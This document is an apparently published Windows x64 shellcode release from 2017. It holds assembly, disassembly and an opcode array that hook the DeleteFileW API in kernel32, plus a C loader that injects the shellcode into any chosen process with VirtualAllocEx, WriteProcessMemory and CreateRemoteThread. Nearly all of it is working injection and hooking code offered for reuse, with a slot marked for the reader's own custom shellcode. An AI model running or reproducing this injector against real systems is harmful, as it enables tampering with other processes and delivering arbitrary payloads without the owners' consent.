/* # Title : Windows x64 API Hooking Shellcode # Author : Roziul Hasan Khan Shifat # Size : 117 bytes # Date : 16/10/2017 # Email : shifath12@gmail.com # Tested On : Windows 7 Ultimate x64 */ /* This Shellcode hooks DeteleFileW() API Warning: Do no Use this Shellcode on explorer.exe Otherwise You won't be able to delete file from Recycle Bin */ /* section .text global _start _start: xor rdx,rdx mov rax,[gs:rdx+0x60] ;PPEB mov rax,[rax+24] ;PPEB->Ldr mov rsi,[rax+32] ;Ldr->InMemOrderModuleList.Flink mov rax,[rsi] mov rsi,[rax] mov rdi,[rsi+32] ;rdi=kernel32.dll base Address ;--------------------------------------------------------------- xor rsi,rsi mov si,0x29f0 add rsi,rdi ;rsi=VirtualProtect() ;---------------------------------- ;This Part is Important xor r12,r12 mov r12w,0xa2b0 ;0x0000a2b0 is Relative Address of DeleteFileW() add r12,rdi ;r12=DeleteFileW() ;--------------------------------------------------- ;Changing memory attribute mov rcx,r12 push rdx mov dl,9 pop r8 mov r8b,0x40 sub rsp,4 lea r14,[rsp] mov r9,r14 call rsi ;-------------------------------------------------------- mov [r12],byte 0xe9 jmp shellcode inj: pop rdx sub rdx,r12 sub rdx,5 mov [r12+1],rdx xor rdx,rdx mov dl,9 mov rcx,r12 mov r8d,dword [r14] mov r9,r14 call rsi add rsp,4 ret shellcode: call inj ;This is My own shellcode db 0x48,0x31,0xd2,0x65,0x48,0x8b,0x42,0x60,0x48,0x8b,0x40,0x18,0x48,0x8b,0x70,0x20,0x48,0x8b,0x06,0x48,0x8b,0x30,0x48,0x8b,0x7e,0x20,0x68,0x90,0x65,0x01,0x0a,0x80,0x74,0x24,0x03,0x0a,0x5b,0x48,0x01,0xfb,0x52,0x52,0x48,0xb8,0x75,0x73,0x65,0x72,0x33,0x32,0x2e,0x64,0x48,0x89,0x04,0x24,0x66,0xc7,0x44,0x24,0x08,0x6c,0x6c,0x48,0x8d,0x0c,0x24,0x48,0x83,0xec,0x58,0xff,0xd3,0x68,0xb8,0x12,0x07,0x0a,0x80,0x74,0x24,0x03,0x0a,0x5b,0x48,0x01,0xc3,0x48,0x31,0xc9,0x6a,0x10,0x41,0x59,0x51,0x51,0x48,0xba,0x41,0x50,0x49,0x20,0x42,0x6c,0x6f,0x63,0x48,0x89,0x14,0x24,0xc7,0x44,0x24,0x08,0x6b,0x65,0x64,0x21,0x48,0x8d,0x14,0x24,0x52,0x41,0x58,0x48,0x83,0xec,0x58,0x48,0x83,0xec,0x58,0xff,0xd3,0x90,0x48,0x31,0xd2,0x66,0xba,0x28,0x01,0x48,0x01,0xd4,0xc3 */ /* apiint.obj: file format pe-x86-64 Disassembly of section .text: 0000000000000000 <_start>: 0: 48 31 d2 xor %rdx,%rdx 3: 65 48 8b 42 60 mov %gs:0x60(%rdx),%rax 8: 48 8b 40 18 mov 0x18(%rax),%rax c: 48 8b 70 20 mov 0x20(%rax),%rsi 10: 48 8b 06 mov (%rsi),%rax 13: 48 8b 30 mov (%rax),%rsi 16: 48 8b 7e 20 mov 0x20(%rsi),%rdi 1a: 48 31 f6 xor %rsi,%rsi 1d: 66 be f0 29 mov $0x29f0,%si 21: 48 01 fe add %rdi,%rsi 24: 4d 31 e4 xor %r12,%r12 27: 66 41 bc b0 a2 mov $0xa2b0,%r12w 2c: 49 01 fc add %rdi,%r12 2f: 4c 89 e1 mov %r12,%rcx 32: 52 push %rdx 33: b2 09 mov $0x9,%dl 35: 41 58 pop %r8 37: 41 b0 40 mov $0x40,%r8b 3a: 48 83 ec 04 sub $0x4,%rsp 3e: 4c 8d 34 24 lea (%rsp),%r14 42: 4d 89 f1 mov %r14,%r9 45: ff d6 callq *%rsi 47: 41 c6 04 24 e9 movb $0xe9,(%r12) 4c: eb 22 jmp 70 000000000000004e : 4e: 5a pop %rdx 4f: 4c 29 e2 sub %r12,%rdx 52: 48 83 ea 05 sub $0x5,%rdx 56: 49 89 54 24 01 mov %rdx,0x1(%r12) 5b: 48 31 d2 xor %rdx,%rdx 5e: b2 09 mov $0x9,%dl 60: 4c 89 e1 mov %r12,%rcx 63: 45 8b 06 mov (%r14),%r8d 66: 4d 89 f1 mov %r14,%r9 69: ff d6 callq *%rsi 6b: 48 83 c4 04 add $0x4,%rsp 6f: c3 retq 0000000000000070 : 70: e8 d9 ff ff ff callq 4e 75: 48 31 d2 xor %rdx,%rdx 78: 65 48 8b 42 60 mov %gs:0x60(%rdx),%rax 7d: 48 8b 40 18 mov 0x18(%rax),%rax 81: 48 8b 70 20 mov 0x20(%rax),%rsi 85: 48 8b 06 mov (%rsi),%rax 88: 48 8b 30 mov (%rax),%rsi 8b: 48 8b 7e 20 mov 0x20(%rsi),%rdi 8f: 68 90 65 01 0a pushq $0xa016590 94: 80 74 24 03 0a xorb $0xa,0x3(%rsp) 99: 5b pop %rbx 9a: 48 01 fb add %rdi,%rbx 9d: 52 push %rdx 9e: 52 push %rdx 9f: 48 b8 75 73 65 72 33 movabs $0x642e323372657375,%rax a6: 32 2e 64 a9: 48 89 04 24 mov %rax,(%rsp) ad: 66 c7 44 24 08 6c 6c movw $0x6c6c,0x8(%rsp) b4: 48 8d 0c 24 lea (%rsp),%rcx b8: 48 83 ec 58 sub $0x58,%rsp bc: ff d3 callq *%rbx be: 68 b8 12 07 0a pushq $0xa0712b8 c3: 80 74 24 03 0a xorb $0xa,0x3(%rsp) c8: 5b pop %rbx c9: 48 01 c3 add %rax,%rbx cc: 48 31 c9 xor %rcx,%rcx cf: 6a 10 pushq $0x10 d1: 41 59 pop %r9 d3: 51 push %rcx d4: 51 push %rcx d5: 48 ba 41 50 49 20 42 movabs $0x636f6c4220495041,%rdx dc: 6c 6f 63 df: 48 89 14 24 mov %rdx,(%rsp) e3: c7 44 24 08 6b 65 64 movl $0x2164656b,0x8(%rsp) ea: 21 eb: 48 8d 14 24 lea (%rsp),%rdx ef: 52 push %rdx f0: 41 58 pop %r8 f2: 48 83 ec 58 sub $0x58,%rsp f6: 48 83 ec 58 sub $0x58,%rsp fa: ff d3 callq *%rbx fc: 90 nop fd: 48 31 d2 xor %rdx,%rdx 100: 66 ba 28 01 mov $0x128,%dx 104: 48 01 d4 add %rdx,%rsp 107: c3 retq */ #include #include #include #include unsigned char shellcode[]=\ //Main Shellcode (Interceptor Shellcode) "\x48\x31\xd2\x65\x48\x8b\x42\x60\x48\x8b\x40\x18\x48\x8b\x70\x20\x48\x8b\x06\x48\x8b\x30\x48\x8b\x7e\x20\x48\x31\xf6\x66\xbe\xf0\x29\x48\x01\xfe\x4d\x31\xe4\x66\x41\xbc\xb0\xa2\x49\x01\xfc\x4c\x89\xe1\x52\xb2\x09\x41\x58\x41\xb0\x40\x48\x83\xec\x04\x4c\x8d\x34\x24\x4d\x89\xf1\xff\xd6\x41\xc6\x04\x24\xe9\xeb\x22\x5a\x4c\x29\xe2\x48\x83\xea\x05\x49\x89\x54\x24\x01\x48\x31\xd2\xb2\x09\x4c\x89\xe1\x45\x8b\x06\x4d\x89\xf1\xff\xd6\x48\x83\xc4\x04\xc3\xe8\xd9\xff\xff\xff" //Your Custom shellcode "\x48\x31\xd2\x65\x48\x8b\x42\x60\x48\x8b\x40\x18\x48\x8b\x70\x20\x48\x8b\x06\x48\x8b\x30\x48\x8b\x7e\x20\x68\x90\x65\x01\x0a\x80\x74\x24\x03\x0a\x5b\x48\x01\xfb\x52\x52\x48\xb8\x75\x73\x65\x72\x33\x32\x2e\x64\x48\x89\x04\x24\x66\xc7\x44\x24\x08\x6c\x6c\x48\x8d\x0c\x24\x48\x83\xec\x58\xff\xd3\x68\xb8\x12\x07\x0a\x80\x74\x24\x03\x0a\x5b\x48\x01\xc3\x48\x31\xc9\x6a\x10\x41\x59\x51\x51\x48\xba\x41\x50\x49\x20\x42\x6c\x6f\x63\x48\x89\x14\x24\xc7\x44\x24\x08\x6b\x65\x64\x21\x48\x8d\x14\x24\x52\x41\x58\x48\x83\xec\x58\x48\x83\xec\x58\xff\xd3\x90\x48\x31\xd2\x66\xba\x28\x01\x48\x01\xd4\xc3"; int main() { HANDLE snap,proc,mem; DWORD len,l,pid; PROCESSENTRY32 ps; ps.dwSize=sizeof(ps); len=strlen(shellcode); snap=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0); if(snap==INVALID_HANDLE_VALUE) { printf("CreateToolhelp32Snapshot() Failed"); return 0; } if(!Process32First(snap,&ps)) { printf("Process32First() Failed"); return 0; } do { printf("%s : %ld\n",ps.szExeFile,ps.th32ProcessID); }while(Process32Next(snap,&ps)); printf("\nEnter Process ID: "); scanf("%ld",&pid); proc=OpenProcess(PROCESS_ALL_ACCESS,0,pid); if(!proc) { printf("Failed to Open Process"); return 0; } mem=VirtualAllocEx(proc,NULL,len,MEM_COMMIT,PAGE_EXECUTE_READWRITE); if(!mem) { printf("Failed to allocate memory in process"); return 0; } WriteProcessMemory(proc,mem,shellcode,len,NULL); VirtualProtectEx(proc,mem,len,PAGE_EXECUTE_READ,&l); CreateRemoteThread(proc,NULL,0,(LPTHREAD_START_ROUTINE)mem,NULL,0,0); CloseHandle(proc); return 0; }